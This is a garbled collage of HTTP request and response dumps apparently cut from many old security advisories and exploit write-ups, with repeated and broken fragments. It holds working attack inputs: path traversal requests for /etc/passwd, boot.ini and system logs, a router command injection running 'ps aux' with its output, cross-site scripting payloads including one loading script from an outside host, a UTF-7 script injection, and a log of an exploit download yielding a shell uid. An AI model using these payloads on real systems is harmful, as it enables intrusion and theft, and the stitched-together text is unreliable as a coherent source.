400 Bad Request
same behavior would be exhibited by the victim proxy with host names:
// Lets check our target IP is handled by a NetCache:
$ printf "TRACE / HTTP/1.1\r\nHost: 74.125.65.106\r\nMax-Forwards:
0\r\nConnection: Close\r\n\r\n" | nc 74.125.65.106 80
HTTP/1.1 200 OK
Date: Mon, 17 Aug 2009 00:35:16 GMT
Content-Length: 97
Content-Type: message/http
Server: NetCache appliance (NetApp/6.0.7)
Connection: close
Content-type: text/html
Keep-Alive: 300
Connection: keep-alive
HTTP/1.1 200 OK
Date: Thu, 09 Aug 2007 01:01:48 GMT
Server: Apache/1.3.29 (Unix) PHP/5.1.6 with Suhosin-Patch mod_ssl/2.8.16 OpenSSL/0.9.7j
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
> Host: www.example.com
> Accept: */*
> Content-Length: 71
> Content-Type: application/x-www-form-urlencoded
>
< HTTP/1.1 200 OK
< Date: Mon, 17 Dec 2007 19:29:34 GMT
< Server: Apache
< X-Powered-By: PHP/1.2.3-linuxz
< Content-Length: 355
< Content-Type: text/html
--B-O-U-N-D-A-R-Y731553141--
reply:
HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
X-Powered-By: PHP/5.1.2
Set-Cookie: latest=img262; expires=Sun, 18-Jan-2009 07:56:24 GMT; path=/; domain=.imageshack.us
Set-Cookie: PHPSESSID=[..]; path=/
Connection: close
HEAD /../../var/log/messages HTTP/1.0
HTTP/1.1 200 OK
Content-Length: 178455
Content-Type: text/plain
Last-Modified: Thu, 25 Oct 2007 16:36:39 GMT
Server: Shttp/ServerKit
Date: Thu, 25 Oct 2007 16:42:32 GMT
You can save it in a text file and use it with netcat
(http://netcat.sourceforge.net/) like:
>nc bld02 80 < db_dump.txt | more
HTTP/1.1 200 OK
Date: Tue, 20 Oct 2009 09:01:58 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.3 with Suhosin-Patch
mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-2ubuntu4.3
Pragma: private
Accept: */*
PARTIAL HTTP RESPONSE (payload is returned after the 'postdata' tag):
HTTP/1.1 200 OK
Connection: close
Expires: 0
Date: Wed, 12 Dec 2007 17:32:08 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
#
# --12:19:27-- http://www.wekk.net/research/CVE-2007-5301/exploit.ogg
# => `exploit.ogg'
# Resolving www.wekk.net... 64.22.71.90
# Connecting to www.wekk.net|64.22.71.90|:80... connected.
# HTTP request sent, awaiting response... 200 OK
# Length: 5,421 (5.3K) [application/ogg]
#
# 100%[===============================================================================>] 5,421
# 12:19:28 (37.00 KB/s) - `exploit.ogg' saved [5421/5421]
# uid=1000(whats) gid=1000(whats) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(whats)
only the unfiltered value of the vulnerable parameter. It is possible
to create an URL which causes the resulting page to contain malicious
JavaScript code. A response to such a request could look like the
following example:
HTTP/1.1 200 OK
Date: Fri, 18 Jul 2008 13:13:30 GMT
Server: <server>
content-type: text/plain
Content-Length: 67
Keep-Alive: timeout=10, max=500
1. GET / HTTP/1.1
>>>>>>> <body onload='sendMsg("758474843719")
2. POST /index.php?checknum=758474843719&msg=baseapp HTTP/1.1
>>>>>>> HTTP/1.1 200 OK
Date: Mon, 27 Aug 2007 18:58:21 GMT
Server: Apache/2.2.3 (Debian) DAV/2 SVN/1.4.2 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
MSG 50 D 555
MIME-Version: 1.0
Content-Type: application/x-msnmsgrp2p
P2P-Dest: bbbb@hotmail.it
####^áEu######################ÔùH(############MSNSLP/1.0 200 OK
To: <msnmsgr:bbbbb@hotmail.it>
From: <msnmsgr:aaaa@hotmail.it>
Via: MSNSLP/1.0/TLP ;branch={31DB585D-3119-40AF-B02B-3D9BAEF32CD0}
CSeq: 1
Call-ID: {9A68685A-1FCF-86A1-B639-BA769BA9B514}
Date: Thu, 25 Sep 2008 11:35:20 GMT
Server: Apache/2.2.3
Location: http://server/opennms/event/list?
Content-Length: 0
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 36
<html><body>BugSec</body></html><!--=
Content-Length: 0
We have recrived a lot of question about news http://securityreason.com/news/0/0x1f . And we will show How to exploit this issue. When using PHP as an Apache module, you can also change the configuration settings using directives in .htaccess file. But it is possible to bypass a safe_mode or open_basedir per mail.force_extra_parameters. In a lot of servers is sendmail, can be also exim etc. But we show how to exploit this for a famous mail server (SENDMAIL).
For example you can set mail.force_extra_parameters via .htaccess.
cxib# curl -I http://localhost:82
HTTP/1.1 200 OK
Date: Thu, 06 Sep 2007 22:18:35 GMT
Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.4
Last-Modified: Sat, 20 Nov 2004 20:16:24 GMT
ETag: "27e4f0-2c-4c23b600"
Accept-Ranges: bytes
Escape character is '^]'.
GET /../../../../../../../../etc/passwd HTTP/1.0
Host: 192.168.1.10
Authorization: Basic c2VydmljZTpzZXJ2aWNl
HTTP/1.0 200 OK
Content-type: text/plain
Expires: Sat, 24 May 1980.7:00:00.GMT
Pragma: no-cache
Server: simple httpd 1.0
Type: text/html; charset%3dutf-7%0d%0a%0d%0a<html><body>+ADw-script+AD4-
alert('owned')+ADw-/script+AD4-</body></html>
This will result in:
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-7
Server: Microsoft-IIS/6.0
Set-Cookie: url=cooki1=value1;
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Keep-Alive: 300
Connection: keep-alive
Cookie: sessionid=[...]; cadata="[...]"
And we get a redirection to the website defined:
HTTP/1.1 200 OK
Cache-Control: No-cache
Content-Length: 277
Content-Type: text/html
Expires: Fri, 28 Mar 2008 08:53:11 GMT
Server: Microsoft-IIS/6.0
GET /setup.cgi?ping_ipaddr1=1&ping_ipaddr2=1&ping_ipaddr3=1&ping_ipaddr4=1&ping_size=60&ping_number=1&ping_interval=1000&ping_timeout=5000&start=Start+Test&todo=ping_test&this_file=Diagnostics.htm&next_file=Diagnostics.htm&c4_ping_ipaddr=1.1.1.1;/bin/ps aux&message= HTTP/1.1
Host: 192.168.1.1
Authorization: Basic YWRtaW46YWRtaW4=
HTTP/1.0 200 OK
sh: cannot create 1: Unknown error 30
killall: pingmultilang: no process killed
killall: 2: no process killed
PID Uid VmSize Stat Command
1 root 284 S init
Accept: */*
PARTIAL HTTP RESPONSE (payload is returned after the 'postdata' tag):
HTTP/1.1 200 OK
Connection: close
Expires: 0
Date: Wed, 12 Dec 2007 17:32:08 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
> Keep-Alive: 300
> Connection: keep-alive
> Cookie: sessionid=[...]; cadata="[...]"
>
> And we get a redirection to the website defined:
> HTTP/1.1 200 OK
> Cache-Control: No-cache
> Content-Length: 277
> Content-Type: text/html
> Expires: Fri, 28 Mar 2008 08:53:11 GMT
> Server: Microsoft-IIS/6.0
src=http://xxx/a.js></script>'>a</a>
</html>
The link includes the cross site scripting injection
and brings the victim to page 2.html. The web server
returns 200 OK. The 2.html source code:
2.HTML
<html>
This is a proof of concept.
Accept: */*
PARTIAL HTTP RESPONSE (payload is returned after the 'postdata' tag):
HTTP/1.1 200 OK
Connection: close
Expires: 0
Date: Wed, 12 Dec 2007 17:32:08 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
Pragma: no-cache
url=../../../../../../../../boot.ini&login_loginName=example&login_loginPassword=example&login_cmd_logon=Login&defaultAction=Example&login_cmd_logon_resultPage=%2Fboxalino%2Fclient%2Fdesktop%2Fdefault%2Ehtm
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Content-Type: text/html
Content-Length: 208
Date: Wed, 29 Apr 2009 09:01:06 GMT
Content-Length: 0
Location:
Transfer-Encoding: chunked
Content-Type: text/plain
HTTP/1.1 200 OK
Content-Type: text/plain
http://www.ush.it
--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--
username=psirt&password=easy&Login=Login&next=&tgroup=&tgcookieset=
Response:
HTTP/1.1 200 OK
Server: Virata-EmWeb/R6_2_0
Content-Type: text/html
Cache-Control: max-age=0
Set-Cookie: webvpn=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/
Set-Cookie: webvpnlogin=1
Proxy-Connection: Keep-Alive
When the request will be executed, a popup showing the string Pwnd can be seen.
Here the response:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.1.GA (build: SVNTag=JBoss_4_2_1_GA
date=200707131605)/Tomcat-5.5
content-disposition: inline;filename=Customer_Lifetime_Orders.html
Content-Type: text/html;charset=UTF-8
Content-Length: 56
Starting, please wait..."><script>alert(1);</script>
RESPONSE:
HTTP/1.1 200 OK
Server: Cisco AWARE 2.0
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
username=psirt&password=easy&Login=Login&next=&tgroup=&tgcookieset=
Response:
HTTP/1.1 200 OK
Server: Virata-EmWeb/R6_2_0
Content-Type: text/html
Cache-Control: max-age=0
Set-Cookie: webvpn=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/
Set-Cookie: webvpnlogin=1
Accept: */*
PARTIAL HTTP RESPONSE (payload is returned after the 'postdata' tag):
HTTP/1.1 200 OK
Connection: close
Expires: 0
Date: Wed, 12 Dec 2007 17:32:08 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
|
